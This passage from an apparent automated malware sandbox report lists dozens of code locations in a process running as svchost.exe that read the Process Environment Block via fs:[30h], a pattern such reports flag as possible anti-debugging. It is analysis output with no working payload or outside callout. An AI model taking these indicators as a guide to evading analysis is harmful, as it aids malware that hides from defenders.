                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]1_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
